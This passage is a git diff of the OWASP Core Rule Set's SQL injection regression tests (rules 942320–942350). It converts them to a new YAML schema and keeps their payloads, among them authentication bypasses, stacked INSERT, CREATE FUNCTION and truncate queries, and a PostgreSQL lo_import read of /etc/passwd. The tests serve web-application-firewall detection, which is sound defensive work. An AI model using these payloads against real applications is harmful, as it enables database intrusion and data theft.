uri: "/post" - data: "pay=exec+%28%40%0A" - version: HTTP/1.0 - output: - log_contains: id "942320" - - test_title: 942320-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=exec+%28%40%0A" + version: HTTP/1.0 + output: + log: + expect_ids: [942320] + - test_id: 3 desc: "Detects MySQL and PostgreSQL stored procedure/function injections" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=declare+%40b%0A" - version: HTTP/1.0 - output: - log_contains: id "942320" - - test_title: 942320-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=declare+%40b%0A" + version: HTTP/1.0 + output: + log: + expect_ids: [942320] + - test_id: 4 desc: "Detects MySQL and PostgreSQL stored procedure/function injections" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=DECLARE%2F%2A%2A%2F%40x%0A" - version: HTTP/1.0 - output: - log_contains: id "942320" - - test_title: 942320-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=DECLARE%2F%2A%2A%2F%40x%0A" + version: HTTP/1.0 + output: + log: + expect_ids: [942320] + - test_id: 5 desc: "Detects PostgreSQL data conversion with ::int" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/index.php?id=password::int" - version: HTTP/1.0 - output: - log_contains: id "942320" - - test_title: 942320-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/index.php?id=password::int" + version: HTTP/1.0 + output: + log: + expect_ids: [942320] + - test_id: 6 desc: "Detects PostgreSQL data conversion with ::bool" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/index.php?no=2&id=1%27%20and%20unistr(password)::bool--" - version: HTTP/1.0 - output: - log_contains: id "942320" - - test_title: 942320-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/index.php?no=2&id=1%27%20and%20unistr(password)::bool--" + version: HTTP/1.0 + output: + log: + expect_ids: [942320] + - test_id: 7 desc: "Detects PostgreSQL bypass attempt with div(23,-2) - issue #2910" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/index.php?id=div(23,-2)" - version: HTTP/1.0 - output: - log_contains: id "942320" - - test_title: 942320-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/index.php?id=div(23,-2)" + version: HTTP/1.0 + output: + log: + expect_ids: [942320] + - test_id: 8 desc: "Detects PostgreSQL bypass attempt with div (23.23 , 2) - issue #2910" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/index.php?id=div+(23.23+,+2)" - version: HTTP/1.0 - output: - log_contains: id "942320" - - test_title: 942320-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/index.php?id=div+(23.23+,+2)" + version: HTTP/1.0 + output: + log: + expect_ids: [942320] + - test_id: 9 desc: "Detects PostgreSQL bypass attempt lo_import'( - issue #2912" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/index.php?id=lo_import(%27/etc%27%20||%20%27/pass%27%20||%20%27wd%27)" - version: HTTP/1.0 - output: - log_contains: id "942320" - - test_title: 942320-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/index.php?id=lo_import(%27/etc%27%20||%20%27/pass%27%20||%20%27wd%27)" + version: HTTP/1.0 + output: + log: + expect_ids: [942320] + - test_id: 10 desc: "Detects PostgreSQL bypass attempt with lo_get(16400) - issue #2924" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/index.php?id=lo_get(16400)" - version: HTTP/1.0 - output: - log_contains: id "942320" - - test_title: 942320-11 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/index.php?id=lo_get(16400)" + version: HTTP/1.0 + output: + log: + expect_ids: [942320] + - test_id: 11 desc: "Detects PostgreSQL bypass attempt function(foo)::text - issue #2924" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/index.php?id=function(foo)::text" - version: HTTP/1.0 - output: - log_contains: id "942320" - - test_title: 942320-12 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/index.php?id=function(foo)::text" + version: HTTP/1.0 + output: + log: + expect_ids: [942320] + - test_id: 12 desc: "Detects PostgreSQL bypass attempt function(foo)::bigint - issue #2924" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/index.php?id=function(foo)::bigint" - version: HTTP/1.0 - output: - log_contains: id "942320" - - test_title: 942320-13 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/index.php?id=function(foo)::bigint" + version: HTTP/1.0 + output: + log: + expect_ids: [942320] + - test_id: 13 desc: "Detects PostgreSQL bypass attempt function(foo)::double precision - issue #2924" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/index.php?id=function(foo)::double%20precision" - version: HTTP/1.0 - output: - log_contains: id "942320" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/index.php?id=function(foo)::double%20precision" + version: HTTP/1.0 + output: + log: + expect_ids: [942320] diff --git a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942321.yaml b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942321.yaml index 2ebdb67..5a111a2 100644 --- a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942321.yaml +++ b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942321.yaml @@ -1,38 +1,37 @@ --- meta: author: "Franziska Bühler, azurit" - enabled: true - name: 942321.yaml +rule_id: 942321 tests: - - test_title: 942321-1 + - test_id: 1 desc: "Detects MySQL and PostgreSQL stored procedure/function injections" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: encode(lo_get(16200),'base64')::int - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - log_contains: id "942321" - - test_title: 942321-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: encode(lo_get(16200),'base64')::int + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + log: + expect_ids: [942321] + - test_id: 2 desc: "Detects MySQL and PostgreSQL stored procedure/function injections" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: overlay(password placing $$$$ from 1)::int and id=1 - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - log_contains: id "942321" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: overlay(password placing $$$$ from 1)::int and id=1 + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + log: + expect_ids: [942321] diff --git a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942330.yaml b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942330.yaml index 6cee8d0..5f3f314 100644 --- a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942330.yaml +++ b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942330.yaml @@ -1,94 +1,92 @@ --- meta: author: "Christian S.J. Peron, azurit" - description: None - enabled: true - name: 942330.yaml +rule_id: 942330 tests: - - test_title: 942330-1 + - test_id: 1 desc: "classic SQL injection probings 1/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=%22%27&var2=whatever" - version: HTTP/1.0 - output: - log_contains: id "942330" - - test_title: 942330-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=%22%27&var2=whatever" + version: HTTP/1.0 + output: + log: + expect_ids: [942330] + - test_id: 2 desc: "Test first backslash match ([\"'`\x5c]*?)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=\\\"1 or 1-" - version: HTTP/1.0 - output: - log_contains: id "942330" - - test_title: 942330-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=\\\"1 or 1-" + version: HTTP/1.0 + output: + log: + expect_ids: [942330] + - test_id: 3 desc: "Test second backslash match (\x5cx(?:23|27|3d))" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=\\x23" - version: HTTP/1.0 - output: - log_contains: id "942330" - - test_title: 942330-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=\\x23" + version: HTTP/1.0 + output: + log: + expect_ids: [942330] + - test_id: 4 desc: "Test false positive issue nr. 3205" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: | - "var=05111222333 - andy.surname@somedomain.com" - version: HTTP/1.0 - output: - no_log_contains: id "942330" - - test_title: 942330-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: | + "var=05111222333 + andy.surname@somedomain.com" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942330] + - test_id: 5 desc: "Test false positive issue nr. 3205" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=05111222333 andy.surname@somedomain.com" - version: HTTP/1.0 - output: - no_log_contains: id "942330" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=05111222333 andy.surname@somedomain.com" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942330] diff --git a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942340.yaml b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942340.yaml index 901d8a6..88a871d 100644 --- a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942340.yaml +++ b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942340.yaml @@ -1,191 +1,189 @@ --- meta: author: "Christian S.J. Peron, azurit" - description: None - enabled: true - name: 942340.yaml +rule_id: 942340 tests: - - test_title: 942340-1 + - test_id: 1 desc: "basic SQL authentication bypass attempts 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - # in ( select * from - uri: "/get?var=in%20%28%20select%20%2a%20from" - version: HTTP/1.0 - output: - log_contains: id "942340" - - test_title: 942340-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + # in ( select * from + uri: "/get?var=in%20%28%20select%20%2a%20from" + version: HTTP/1.0 + output: + log: + expect_ids: [942340] + - test_id: 2 desc: "SQLite authentication bypass with except select" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - # except \tselect.1,2 - uri: "/get?var=except%20%09select.1%2C2" - version: HTTP/1.0 - output: - log_contains: id "942340" - - test_title: 942340-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + # except \tselect.1,2 + uri: "/get?var=except%20%09select.1%2C2" + version: HTTP/1.0 + output: + log: + expect_ids: [942340] + - test_id: 3 desc: "SQLite authentication bypass with except values" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - # except values (1,2) - uri: "/get?var=except%20values(1%2C2)" - version: HTTP/1.0 - output: - log_contains: id "942340" - - test_title: 942340-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + # except values (1,2) + uri: "/get?var=except%20values(1%2C2)" + version: HTTP/1.0 + output: + log: + expect_ids: [942340] + - test_id: 4 desc: "true-negative except selecting" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - # except selecting - uri: "/get?var=except%20selecting" - version: HTTP/1.0 - output: - no_log_contains: id "942340" - - test_title: 942340-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + # except selecting + uri: "/get?var=except%20selecting" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942340] + - test_id: 5 desc: "basic SQL authentication bypass attempts 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "email=x'%20or%20array[id]%20is%20not%20null--" - version: HTTP/1.0 - output: - log_contains: id "942340" - - test_title: 942340-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email=x'%20or%20array[id]%20is%20not%20null--" + version: HTTP/1.0 + output: + log: + expect_ids: [942340] + - test_id: 6 desc: "basic SQL authentication bypass attempts 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "email=x'%20or%20email~all(array[email]);analyze--" - version: HTTP/1.0 - output: - log_contains: id "942340" - - test_title: 942340-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email=x'%20or%20email~all(array[email]);analyze--" + version: HTTP/1.0 + output: + log: + expect_ids: [942340] + - test_id: 7 desc: "basic SQL authentication bypass attempts 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "email='%20and%20email%20not%20similar%20to%20id--" - version: HTTP/1.0 - output: - log_contains: id "942340" - - test_title: 942340-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email='%20and%20email%20not%20similar%20to%20id--" + version: HTTP/1.0 + output: + log: + expect_ids: [942340] + - test_id: 8 desc: "basic SQL authentication bypass attempts 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "email='%20or%20true;%20foo" - version: HTTP/1.0 - output: - log_contains: id "942340" - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "email='%20or%20false;%20foo" - version: HTTP/1.0 - output: - log_contains: id "942340" - - test_title: 942340-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email='%20or%20true;%20foo" + version: HTTP/1.0 + output: + log: + expect_ids: [942340] + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email='%20or%20false;%20foo" + version: HTTP/1.0 + output: + log: + expect_ids: [942340] + - test_id: 9 desc: "basic SQL authentication bypass attempts 3/3 (no whitespace between operator)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "email='||true" - version: HTTP/1.0 - output: - log_contains: id "942340" - - test_title: 942340-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email='||true" + version: HTTP/1.0 + output: + log: + expect_ids: [942340] + - test_id: 10 desc: "SQL Auth Bypass FP test (invalid operator without whitespace)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "email='ortrue" - version: HTTP/1.0 - output: - no_log_contains: id "942340" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email='ortrue" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942340] diff --git a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942350.yaml b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942350.yaml index 23246f0..7934f55 100644 --- a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942350.yaml +++ b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942350.yaml @@ -1,74 +1,72 @@ --- meta: author: "Christian S.J. Peron, Franziska Bühler, azurit" - description: None - enabled: true - name: 942350.yaml +rule_id: 942350 tests: - - test_title: 942350-1 + - test_id: 1 desc: "MySQL UDF injection and other data/structure manipulation" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - # ; insert INTO table (word) VALUES('dfsd') - uri: "/get?var=%3bINSERT%20INTO%20table%20%28col%29%20VALUES" - version: HTTP/1.0 - output: - log_contains: id "942350" - - test_title: 942350-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + # ; insert INTO table (word) VALUES('dfsd') + uri: "/get?var=%3bINSERT%20INTO%20table%20%28col%29%20VALUES" + version: HTTP/1.0 + output: + log: + expect_ids: [942350] + - test_id: 2 desc: "Fix for FP reported in GitHub issue 1587" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - # ;insertion_424242 - uri: "/get?var=%3Binsertion_424242" - version: HTTP/1.0 - output: - no_log_contains: id "942350" - - test_title: 942350-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + # ;insertion_424242 + uri: "/get?var=%3Binsertion_424242" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942350] + - test_id: 3 desc: "MySQL create function injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - # CREATE FUNCTION hello (s CHAR(20)) RETURNS CHAR(50) DETERMINISTIC RETURN CONCAT('Hello, ',s,'!'); - uri: "/get?var=CREATE+FUNCTION+hello+%28s+CHAR%2820%29%29+RETURNS+CHAR%2850%29+DETERMINISTIC+RETURN+CONCAT%28%27Hello%2C+%27%2Cs%2C%27%21%27%29%3B" - version: HTTP/1.0 - output: - log_contains: id "942350" - - test_title: 942350-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + # CREATE FUNCTION hello (s CHAR(20)) RETURNS CHAR(50) DETERMINISTIC RETURN CONCAT('Hello, ',s,'!'); + uri: "/get?var=CREATE+FUNCTION+hello+%28s+CHAR%2820%29%29+RETURNS+CHAR%2850%29+DETERMINISTIC+RETURN+CONCAT%28%27Hello%2C+%27%2Cs%2C%27%21%27%29%3B" + version: HTTP/1.0 + output: + log: + expect_ids: [942350] + - test_id: 4 desc: "Status Page Test - MySQL injection with ;truncate[xx" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?test=;truncate[xx" - version: HTTP/1.0 - output: - log_contains: id "942350" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?test=;truncate[xx" + version: HTTP/1.0 + output: + log: + expect_ids: [942350] diff --git a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942360.yaml 